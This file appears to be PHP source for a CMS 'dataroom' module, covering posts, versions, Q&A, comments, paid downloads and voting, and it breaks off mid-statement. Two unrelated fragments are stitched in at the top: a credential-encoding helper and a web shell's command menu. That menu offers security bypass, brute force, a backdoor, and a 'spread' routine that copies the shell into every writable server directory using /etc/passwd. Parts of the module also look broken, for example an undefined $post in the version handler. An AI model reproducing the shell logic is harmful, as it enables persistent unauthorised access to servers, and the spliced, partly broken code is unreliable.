function createCode($type, $host, $username, $password, $database, $port = null, $charset = null) { $code = array('type' => $type, 'host' => $host, 'username' => $username, 'password' => $password, 'database' => $database); if ($port !== null) { $code['port'] = $port; } if ($charset !== null) { $code['charset'] = $charset; } return Encoder(json_encode($code)); }
case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION = array(); session_destroy(); echo "Logged out from MySQL.<br>"; break; case 'f': FileEditor(); break; case 'encode': Encoder(); break; case 'bypass': security_bypass(); break; case 'bf': brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if (!isset($_POST['spread_shell'])) { echo "<center><form action='?act=spread' method='post'>\n This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br>\n Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br>\n <input type='submit' value='Spread' name='spread_shell'>\n </form></center>"; } else { $s = 0;
function doProcess($action) { $results = new stdClass(); $values = new stdClass(); if ($action == 'listUrl') { $menu = Request('menu'); $page = Request('page'); $page = $this->IM->getPages($menu, $page); $oKey = Request('oKey'); $oKeyword = Request('oKeyword'); $oCategory = Request('oCategory'); $oSort = Request('oSort'); $keyword = Request('keyword'); $category = Request('category'); $sort = Request('sort'); $key = Request('key'); $keyword = Request('keyword'); $p = Request('p') ? Request('p') : 1; $queryString = 'menu=' . $page->menu . '&page=' . $page->page . '&keyword=' . $keyword . '&category=' . $category . '&sort=' . $sort . '&p=' . $p; if ($oKeyword != $keyword || $oCategory != $category || $oSort != $sort) { $p = 1; } $default = array(); if (strlen($keyword) == 0) { $default['keyword'] = ''; } if ($sort == 'update') { $default['sort'] = ''; } if (isset($page->context->config->category) == true && $page->context->config->category == $category) { $default['category'] = ''; } $url = $this->IM->getUrl($page->menu, $page->page, 'list', $p) . $this->IM->getQueryString($default, $queryString); $results->success = true; $results->url = $url; } if ($action == 'postWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->did = Request('did'); $values->menu = Request('menu'); $values->page = Request('page'); $values->category = Request('category'); $values->homepage = Request('homepage'); $values->license = Request('license') ? Request('license') : ($values->errors['license'] = $this->getLanguage('postWrite/help/license/error')); $values->price = Request('price') ? preg_match('/[1-9]+[0-9]*/', Request('price')) == true ? Request('price') : ($values->errors['price'] = $this->getLanguage('postWrite/help/price/error')) : 0; $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error')); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); $values->dataroom = $this->getDataroom($values->did); if ($values->dataroom->use_category == 'USED') { if ($values->category == null || preg_match('/^[1-9]+[0-9]*$/', $values->category) == false) { $values->errors['category'] = $this->getLanguage('postWrite/help/category/error'); } } else { $values->category = 0; } if (isset($_FILES['logo']['tmp_name']) == true && $_FILES['logo']['tmp_name']) { $checkImage = getimagesize($_FILES['logo']['tmp_name']); if (in_array($checkImage[2], array(1, 2, 3)) == false) { $values->errors['logo'] = $this->getLanguage('postWrite/help/logo/error'); } } if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['category'] = $values->category; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['title'] = $values->title; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); $insert['homepage'] = $values->homepage; $insert['license'] = $values->license; $insert['price'] = $values->price; if ($values->idx == null) { $post = null; if ($this->checkPermission('write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } else { $oCategory = null; $reg_date = time(); $insert['reg_date'] = $reg_date; $insert['last_update'] = 0; $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->post, $insert)->execute(); } $this->IM->setArticle('dataroom', $values->did, 'post', $values->idx, 0); $this->IM->getModule('member')->sendPoint(null, $values->dataroom->post_point, 'dataroom', 'post', array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->dataroom->post_exp, 'dataroom', 'post', array('idx' => $values->idx)); } else { $post = $this->getPost($values->idx); $oCategory = $post->category; $reg_date = $post->reg_date; if ($this->checkPermission('modify') == false && $post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute(); $this->IM->setArticle('dataroom', $values->did, 'post', $values->idx, $post->last_update); if ($post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($post->midx, 'dataroom', 'post_modify', $values->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null, 0, 'dataroom', 'post_modify', array('idx' => $values->idx)); } } if ($results->success == true) { if (isset($_FILES['logo']['tmp_name']) == true && $_FILES['logo']['tmp_name']) { $fileName = $_FILES['logo']['name']; $tempFileName = $this->IM->getModule('attachment')->getTempPath(true) . '/' . md5_file($_FILES['logo']['tmp_name']); if ($this->IM->getModule('attachment')->createThumbnail($_FILES['logo']['tmp_name'], $tempFileName, 500, 0, true) == true) { if ($post == null || $post->logo == 0) { $logoIdx = $this->IM->getModule('attachment')->fileSave($fileName, $tempFileName, 'dataroom', 'logo'); } else { $logoIdx = $this->IM->getModule('attachment')->fileReplace($post->logo, $fileName, $tempFileName); } $this->db()->update($this->table->post, array('logo' => $logoIdx))->where('idx', $values->idx)->execute(); $this->IM->getModule('attachment')->filePublish($logoIdx); } } for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->did, 'type' => 'POST', 'parent' => $values->idx))->execute(); } $this->IM->getModule('attachment')->filePublish($values->attachments[$i]); } if ($oCategory != 0 && $oCategory != $values->category) { $lastPost = $this->db()->select($this->table->post)->where('category', $oCategory)->orderBy('last_update', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->last_update : 0; $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $oCategory)->execute(); } if ($values->category != 0 && $oCategory != $values->category) { $lastPost = $this->db()->select($this->table->post)->where('category', $values->category)->orderBy('last_update', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->last_update : 0; $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $values->category)->execute(); } $postnum = $this->db()->select($this->table->post)->where('did', $values->did)->count(); $this->db()->update($this->table->dataroom, array('postnum' => $postnum))->where('did', $values->did)->execute(); $page = $this->IM->getPages($values->menu, $values->page); if ($page->context->config == null) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, $post == null ? 'version' : 'view', $values->idx); } elseif ($page->context->config->category == $values->category) { $results->redirect = $this->IM->getUrl($values->menu, $values->page, $post == null ? 'version' : 'view', $values->idx); } else { $redirectPage = $this->getPostPage($values->idx); $results->redirect = $this->IM->getUrl($redirectPage->menu, $redirectPage->page, $post == null ? 'version' : 'view', $values->idx); } } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'postDelete') { $values->idx = Request('idx'); $post = $this->getPost($values->idx); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('post', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'versionWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->parent = Request('parent'); $values->did = Request('did'); $values->menu = Request('menu'); $values->page = Request('page'); $values->version = preg_match('/^[0-9]+\\.[0-9]+(\\.[0-9]+)?$/', Request('version')) == true ? Request('version') : ($values->errors['version'] = $this->getLanguage('versionWrite/help/history/error')); $values->history = Request('history') ? Request('history') : ($values->errors['history'] = $this->getLanguage('versionWrite/help/history/error')); $values->dataroom = $this->getDataroom($values->did); $values->post = $this->getPost($values->parent); if (version_compare($values->post->last_version, $values->version, '>=') == true) { $values->errors['version'] = $this->getLanguage('versionWrite/help/version/lowVersion'); } if (isset($_FILES['file']['tmp_name']) == true && $_FILES['file']['tmp_name']) { if ($this->IM->getModule('attachment')->getFileMime($_FILES['file']['tmp_name']) != 'application/zip') { $errors['file'] = $this->getLanguage('versionWrite/help/file/notzip'); } } if (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['parent'] = $values->parent; $insert['version'] = $values->version; $insert['history'] = $values->history; if ($values->idx == null) { if ($this->checkPermission('write') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } else { $reg_date = time(); $insert['reg_date'] = $reg_date; $values->idx = $this->db()->insert($this->table->post_version, $insert)->execute(); $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->parent); } // Action Register } else { $oCategory = $post->category; $reg_date = $post->reg_date; if ($this->checkPermission('post_modify') == false && ($post->midx != 0 && $post->midx != $this->IM->getModule('member')->getLogged())) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($post->midx == 0) { if ($mHash->password_validate($values->password, $post->password) == false) { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } if ($results->success == true) { if ($this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $this->db()->update($this->table->post, $insert)->where('idx', $post->idx)->execute(); } $insert['reg_date'] = $post['reg_date']; } if ($results->success == true) { if (isset($_FILES['file']['tmp_name']) == true && $_FILES['file']['tmp_name']) { $fileName = $_FILES['file']['name']; $fileIdx = $this->IM->getModule('attachment')->fileSave($fileName, $_FILES['file']['tmp_name'], 'dataroom', 'file'); $this->db()->update($this->table->post_version, array('file' => $fileIdx))->where('idx', $values->idx)->execute(); } $lastVersion = $this->db()->select($this->table->post_version)->where('parent', $values->parent)->orderBy('reg_date', 'desc')->getOne(); $this->db()->update($this->table->post, array('last_version' => $lastVersion->version, 'last_update' => $lastVersion->reg_date))->where('idx', $values->parent)->execute(); if ($values->post->category != 0) { $this->db()->update($this->table->category, array('last_post' => $lastVersion->reg_date))->where('idx', $values->post->category)->execute(); } $lastPost = $this->db()->select($this->table->post)->where('did', $values->did)->orderBy('last_update', 'desc')->getOne(); $this->db()->update($this->table->dataroom, array('last_post' => $lastPost->last_update))->where('did', $values->did)->execute(); $this->IM->setArticle('dataroom', $values->did, 'post', $values->post->idx, time()); $page = $this->IM->getPages($values->menu, $values->page); $results->redirect = $this->IM->getUrl($values->menu, $values->page, 'view', $values->parent); } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'getQna') { $values->get = Request('get'); if ($values->get == 'page') { $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->qnalimit = $values->dataroom->qnalimit; $values->page = Request('page'); $values->qnas = $this->getQnaPage($values->parent, $values->page, $values->qnalimit); if ($values->page > 1 && count($values->qnas) == 0) { while ($values->page > 1) { $values->page = $values->page - 1; $values->qnas = $this->getMentPage($values->parent, $values->page, $values->qnalimit); if (count($values->qnas) > 0) { break; } } } if (count($values->qnas) > 0) { $results->page = $values->page; } } elseif ($values->get == 'idx') { $values->idx = Request('idx'); $qna = $this->db()->select($this->table->question)->where('idx', $values->idx)->getOne(); $values->dataroom = $this->getDataroom($qna->did); $values->qnalimit = $values->dataroom->qnalimit; $values->parent = $qna->parent; if ($qna != null) { $values->post = $this->getPost($values->parent); $prevCount = $this->db()->select($this->table->question)->where('parent', $qna->parent)->where('idx', $qna->idx, '>')->count(); $values->page = floor($prevCount / $values->qnalimit) + 1; $values->qnas = $this->getQnaPage($values->parent, $values->page, $values->qnalimit); $results->page = $values->page; } else { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('qnaList/empty') . '</div>'; } } if (count($values->qnas) == 0) { $results->page = null; $results->qnaHtml = '<div class="empty">' . $this->getLanguage('qnaList/empty') . '</div>'; } else { $results->qnaHtml = ''; for ($i = 0, $loop = count($values->qnas); $i < $loop; $i++) { $results->qnaHtml .= $this->getQnaItem($values->qnas[$i]); } } $results->success = true; $results->parent = $values->parent; if ($results->page != null) { $results->qnaCount = number_format($values->post->qna); } $results->pagination = $this->getQnaPagination($results->parent, $results->page); } if ($action == 'getQnaView') { $values->idx = Request('idx'); $results->success = true; $results->idx = $values->idx; $results->qnaHtml = $this->getQnaView($values->idx); } if ($action == 'getQnaWrite') { $values->parent = Request('parent') ? Request('parent') : null; $values->post = $this->getPost($values->parent); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('qna_write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/mypost'); } else { $results->success = true; $results->parent = $values->parent; $results->qnaHtml = $this->getQnaWrite($values->parent); } } if ($action == 'qnaWrite') { $values->errors = array(); $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->did = $values->dataroom->did; $values->title = Request('title') ? Request('title') : ($values->errors['title'] = $this->getLanguage('postWrite/help/title/error')); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); if (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['parent'] = $values->parent; $insert['title'] = $values->title; $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('qna_write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/mypost'); } else { $insert['reg_date'] = time(); $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->question, $insert)->execute(); } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->did, 'type' => 'QUESTION', 'parent' => $values->idx))->execute(); } } $qnanum = $this->db()->select($this->table->question)->where('parent', $values->parent)->count(); $this->db()->update($this->table->post, array('qna' => $qnanum))->where('idx', $values->parent)->execute(); $this->IM->getModule('push')->sendPush($values->post->midx, 'dataroom', 'question', $values->post->idx, array('from' => $this->IM->getModule('member')->getLogged(), 'idx' => $values->idx)); $results->idx = $values->idx; } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'qnaAnswer') { $values->errors = array(); $values->parent = Request('parent'); $values->question = $this->db()->select($this->table->question)->where('idx', $values->parent)->getOne(); $values->post = $this->getPost($values->question->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->did = $values->dataroom->did; $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } $values->content = $this->encodeContent($values->content, $values->attachments); if (empty($values->errors) == true) { $results->success = true; $mHash = new Hash(); $insert = array(); $insert['did'] = $values->did; $insert['parent'] = $values->parent; $insert['content'] = $values->content; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('qna_answer') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($values->question->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/myquestion'); } else { $insert['reg_date'] = time(); $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->answer, $insert)->execute(); } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->did, 'type' => 'ANSWER', 'parent' => $values->idx))->execute(); } } $this->db()->update($this->table->question, array('has_answer' => 'TRUE'))->where('idx', $values->parent)->execute(); $this->IM->getModule('push')->sendPush($values->question->midx, 'dataroom', 'answer', $values->question->idx, array('from' => $this->IM->getModule('member')->getLogged(), 'idx' => $values->idx)); $results->idx = $values->idx; $results->parent = $values->parent; } } else { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'getMent') { $values->get = Request('get'); if ($values->get == 'page') { $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->mentlimit = $values->dataroom->mentlimit; $values->page = Request('page'); $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); if ($values->page > 1 && count($values->ments) == 0) { while ($values->page > 1) { $values->page = $values->page - 1; $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); if (count($values->ments) > 0) { break; } } } if (count($values->ments) == 0) { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . '</div>'; } else { $results->page = $values->page; } } elseif ($values->get == 'idx') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); $values->parent = $ment->parent; if ($ment != null) { $values->page = $this->getMentPosition($values->idx); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->mentlimit = $values->dataroom->mentlimit; $values->ments = $this->getMentPage($values->parent, $values->page, $values->mentlimit); $results->page = $values->page; } else { $results->page = null; $results->mentHtml = '<div class="empty">' . $this->getLanguage('mentList/empty') . '</div>'; } } $results->success = true; $results->parent = $values->parent; $results->mentCount = number_format($values->post->ment); $results->idxs = array(); $results->ments = array(); if (empty($values->mentHtml) == false) { $results->mentHtml = $values->mentHtml; } if ($results->page !== null) { for ($i = 0, $loop = count($values->ments); $i < $loop; $i++) { $results->ments[$i] = array('idx' => $values->ments[$i]->idx, 'modify_date' => $values->ments[$i]->modify_date, 'html' => $this->getMentItem($values->ments[$i])); $results->idxs[$i] = $values->ments[$i]->idx; } } $results->pagination = $this->getMentPagination($results->parent, $results->page); } if ($action == 'getMentDepth') { $idx = Request('idx'); $parent = $this->getMent($idx); if ($parent == null || $parent->is_delete == 'TRUE') { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($parent->depth >= 10) { $results->success = false; $results->message = $this->getLanguage('mentWrite/overdepth'); } else { $results->success = true; $results->depth = $parent->depth; $results->parent = $parent->parent; $results->source = $idx; } } if ($action == 'mentWrite') { $values->errors = array(); $values->idx = Request('idx'); $values->source = Request('source'); $values->parent = Request('parent'); $values->post = $this->getPost($values->parent); $values->dataroom = $this->getDataroom($values->post->did); $values->content = Request('content') ? Request('content') : ($values->errors['content'] = $this->getLanguage('postWrite/help/content/error')); $values->attachments = is_array(Request('attachments')) == true ? Request('attachments') : array(); for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { $values->attachments[$i] = Decoder($values->attachments[$i]); } if ($values->source) { $sourceData = $this->getMent($values->source); if ($sourceData == null) { $results->success = false; $results->message = $this->getLanguage('mentWrite/deleteSource'); } } $values->content = $this->encodeContent($values->content, $values->attachments); if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('ment_write') == false) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif (empty($values->errors) == true) { $mHash = new Hash(); $insert = array(); $insert['did'] = $values->post->did; $insert['parent'] = $values->parent; $insert['midx'] = $this->IM->getModule('member')->getLogged(); $insert['content'] = $values->content; $insert['search'] = GetString($values->content, 'index'); if ($values->idx == null) { $insert['reg_date'] = time(); $insert['ip'] = $_SERVER['REMOTE_ADDR']; $values->idx = $this->db()->insert($this->table->ment, $insert)->execute(); if ($values->source) { $sourceData = $this->getMent($values->source); $head = $sourceData->head; $depth = $sourceData->depth + 1; $source = $sourceData->idx; if ($depth > 1) { $depthData = $this->db()->select($this->table->ment_depth)->where('head', $sourceData->head)->where('arrange', $sourceData->arrange, '>')->where('depth', $sourceData->depth, '<=')->orderBy('arrange', 'asc')->getOne(); if ($depthData == null) { $arrange = $values->idx; } else { $arrange = $depthData->arrange; $this->db()->update($this->table->ment_depth, array('arrange' => $this->db()->inc()))->where('head', $sourceData->head)->where('arrange', $arrange, '>=')->execute(); } } else { $arrange = $values->idx; } } else { $head = $values->idx; $arrange = $values->idx; $depth = 0; $source = 0; } $this->db()->insert($this->table->ment_depth, array('idx' => $values->idx, 'parent' => $values->parent, 'head' => $head, 'arrange' => $arrange, 'depth' => $depth, 'source' => $source))->execute(); if ($values->post->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($values->post->midx, 'dataroom', 'ment', $values->post->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->sendPoint(null, $values->dataroom->ment_point, 'dataroom', 'ment', array('idx' => $values->idx)); $this->IM->getModule('member')->addActivity(null, $values->dataroom->ment_exp, 'dataroom', 'ment', array('idx' => $values->idx)); if ($source != 0 && $sourceData->midx != 0 && $sourceData->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($sourceData->midx, 'dataroom', 'replyment', $values->post->idx, array('idx' => $values->idx, 'from' => $this->IM->getModule('member')->getLogged())); } $results->success = true; } else { $ment = $this->getMent($values->idx); $values->dataroom = $this->getDataroom($ment->did); if ($this->checkPermission('ment_modify') == false && ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged())) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } elseif ($ment->midx == 0) { if ($mHash->password_validate($values->password, $ment->password) == false) { $results->success = false; $results->errors = array('password' => $this->getLanguage('error/incorrectPassword')); $results->message = $this->getLanguage('error/incorrectPassword'); } } if ($results->success == true) { if ($this->IM->getModule('member')->isLogged() == false) { $insert['name'] = $values->name; $insert['password'] = $values->password ? $mHash->password_hash($values->password) : ''; $insert['email'] = $values->email; $insert['ip'] = $_SERVER['REMOTE_ADDR']; } $insert['modify_date'] = time(); $this->db()->update($this->table->ment, $insert)->where('idx', $ment->idx)->execute(); if ($ment->midx != $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('push')->sendPush($ment->midx, 'dataroom', 'ment_modify', $values->idx, array('from' => $this->IM->getModule('member')->getLogged())); } $this->IM->getModule('member')->addActivity(null, $values->dataroom->ment_exp, 'dataroom', 'ment_modify', array('idx' => $values->idx)); } $results->success = true; } if ($results->success == true) { for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) { if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) { $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'did' => $values->post->did, 'type' => 'MENT', 'parent' => $values->idx))->execute(); } } $mentnum = $this->db()->select($this->table->ment)->where('parent', $values->parent)->where('is_delete', 'FALSE')->count(); $this->db()->update($this->table->post, array('ment' => $mentnum))->where('idx', $values->parent)->execute(); $this->IM->setArticle('dataroom', $values->dataroom->did, 'ment', $values->idx, time()); $results->message = $this->getLanguage('mentWrite/success'); $results->idx = $values->idx; $results->parent = $values->parent; $results->page = $this->getMentPosition($values->idx); } } elseif (count($values->errors) > 0) { $results->success = false; $results->message = $this->getLanguage('error/required'); $results->errors = $values->errors; } } if ($action == 'mentModify') { $values->idx = Request('idx'); $values->password = Request('password'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_modify') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $ment->content = $this->getArticleContent($ment->content); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $ment->attachment = Encoder(json_encode($attachments)); $results->data = $ment; } } if ($action == 'mentDelete') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('ment', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'downloadConfirm') { $values->idx = Request('idx'); $values->version = Request('version'); $values->confirm = Request('confirm'); $values->post = $this->getPost($values->idx); $results->success = true; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } elseif ($this->checkPermission('download') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { if ($values->version == 'latest') { $values->post_version = $this->db()->select($this->table->post_version)->where('parent', $values->idx)->orderBy('reg_date', 'desc')->getOne(); } else { $values->post_version = $this->db()->select($this->table->post_version)->where('parent', $values->idx)->where('version', $values->version)->getOne(); } if ($values->post_version == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->downloadUrl = $this->IM->getProcessUrl('dataroom', 'download', array('idx' => $values->idx, 'version' => $values->post_version->version)); } else { $values->purchase = $this->db()->select($this->table->purchase)->where('parent', $values->idx)->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($values->purchase == null) { if ($values->confirm == 'TRUE') { $price = $values->post->price; if ($price == 0 || $this->IM->getModule('member')->sendPoint(null, $price * -1, 'dataroom', 'purchase', array('idx' => $values->idx)) == true) { $this->db()->insert($this->table->purchase, array('parent' => $values->idx, 'midx' => $this->IM->getModule('member')->getLogged(), 'price' => $price, 'reg_date' => time()))->execute(); if ($price > 0) { $this->IM->getModule('member')->sendPoint($values->post->midx, round($price * 0.7), 'dataroom', 'sale', array('idx' => $values->idx), true); } $results->success = true; $results->downloadUrl = $this->IM->getProcessUrl('dataroom', 'download', array('idx' => $values->idx, 'version' => $values->post_version->version)); $this->IM->getModule('member')->addActivity(null, 0, 'dataroom', 'purchase', array('idx' => $values->idx)); } else { $results->success = false; $results->message = $this->getLanguage('error/notEnoughPoint'); } } else { $results->success = true; $results->modalHtml = $this->getDownload($values->idx, $values->post_version->version); } } else { $results->success = true; $results->downloadUrl = $this->IM->getProcessUrl('dataroom', 'download', array('idx' => $values->idx, 'version' => $values->post_version->version)); } } } } if ($action == 'download') { $values->idx = Request('idx'); $values->version = Request('version'); $values->post = $this->getPost($values->idx); if ($this->checkPermission('download') == false && $values->post->midx != $this->IM->getModule('member')->getLogged()) { header("HTTP/1.1 403 Forbidden"); exit; } $values->post_version = $this->db()->select($this->table->post_version)->where('parent', $values->idx)->where('version', $values->version)->getOne(); if ($values->post_version == null) { header("HTTP/1.1 404 Not Found"); } elseif ($values->post->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('attachment')->fileDownload($values->post_version->file, false); } else { $values->purchase = $this->db()->select($this->table->purchase)->where('parent', $values->idx)->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($values->purchase == null) { header("HTTP/1.1 403 Forbidden"); } else { $this->db()->update($this->table->post, array('download' => $this->db()->inc()))->where('idx', $values->idx)->execute(); $this->IM->getModule('attachment')->fileDownload($values->post_version->file); } } exit; } if ($action == 'vote') { $values->type = in_array(Request('type'), array('post', 'ment')) == true ? Request('type') : 'post'; $values->idx = Request('idx'); $values->vote = in_array(Request('vote'), array('good', 'bad')) == true ? Request('vote') : 'good'; if ($this->IM->getModule('member')->isLogged() == false) { $results->success = false; $results->message = $this->getLanguage('error/notLogged'); } else { $article = $this->db()->select($this->table->{$values->type})->where('idx', $values->idx)->getOne(); if ($article == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($article->midx == $this->IM->getModule('member')->getLogged()) { $results->success = false; $results->message = $this->getLanguage('vote/mypost'); } else { $check = $this->db()->select($this->table->history)->where('parent', $values->idx)->where('action', 'VOTE')->where('midx', $this->IM->getModule('member')->getLogged())->getOne(); if ($check == null) { $this->db()->update($this->table->{$values->type}, array($values->vote => $this->db()->inc()))->where('idx', $values->idx)->execute(); $this->db()->insert($this->table->history, array('parent' => 